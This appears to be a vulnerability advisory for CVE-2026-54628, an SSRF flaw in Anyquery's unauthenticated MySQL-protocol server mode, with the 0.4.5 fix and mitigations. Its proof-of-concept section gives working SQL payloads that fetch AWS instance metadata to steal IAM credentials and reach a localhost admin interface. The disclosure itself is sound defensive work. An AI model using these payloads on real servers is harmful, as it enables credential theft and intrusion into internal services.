high · 8.6CVE-2026-54628Jul 14, 2026

CVE-2026-54628: Anyquery SSRF via Unrestricted SQLite Virtual Table Modules in Server Mode

Shubham Kandhare
Security Engagement Manager, SecureLayer7

Anyquery's MySQL-compatible server mode lets unauthenticated remote clients create SQLite virtual tables that fetch any URL, including cloud metadata endpoints and internal services, leaking credentia

Packagegithub.com/julien040/anyquery
Ecosystemgo
Affected< 0.4.5

The problem

When Anyquery runs in server mode (`anyquery server`), it binds a MySQL-protocol TCP port and accepts connections with no authentication by default. Any connected client can execute `CREATE VIRTUAL TABLE ... USING log_reader(...)` or `json_reader(...)`, causing the server process to issue outbound HTTP requests to attacker-supplied URLs.

No access control exists to block requests to loopback, RFC-1918, or link-local addresses. On cloud hosts this lets an attacker hit `http://169.254.169.254/` directly, retrieving IAM tokens and instance metadata. The scope is changed (C:H, S:C in the CVSS vector) because the server acts as a confused deputy on behalf of the attacker.

Proof of concept

A working proof-of-concept for CVE-2026-54628 in github.com/julien040/anyquery, with the exact payload below.

sql
-- Connect unauthenticated to the exposed server:
-- mysql -u root -h <VICTIM_IP> -P 8070

-- Payload 1: steal AWS IAM credentials via IMDSv1
CREATE VIRTUAL TABLE aws_meta USING log_reader('http://169.254.169.254/latest/meta-data/');
SELECT * FROM aws_meta;

-- Payload 2: reach a localhost-only admin interface
CREATE VIRTUAL TABLE local_admin USING log_reader('http://localhost:8000/admin');
SELECT * FROM local_admin LIMIT 10;

The `log_reader` and `json_reader` virtual table modules pass the constructor argument directly to `go-getter` (or the equivalent HTTP fetching layer) with no URL validation. Because SQLite virtual table constructors run synchronously during the `CREATE VIRTUAL TABLE` statement, the server process issues the HTTP request before returning a result to the client.

The patch in 0.4.5 adds an IP/hostname blocklist checked before any outbound fetch is performed in server mode. Private ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and the link-local metadata address (169.254.169.254) are now rejected with an error.

The root cause maps to CWE-918 (SSRF), CWE-441 (Confused Deputy), and CWE-862 (Missing Authorization) because there was no server-mode gate on which virtual table sources were allowed.

The fix

Upgrade to anyquery >= 0.4.5. The release blocks outbound HTTP fetches to loopback, private, and link-local ranges when running in server mode. If you cannot upgrade immediately, do not expose `anyquery server` on a publicly reachable interface, place it behind a firewall rule that restricts client IPs, and configure your cloud instance to use IMDSv2 (which requires a session-oriented token and resists naive SSRF).

Reporter not attributed.

References: [1][2][3]

Related research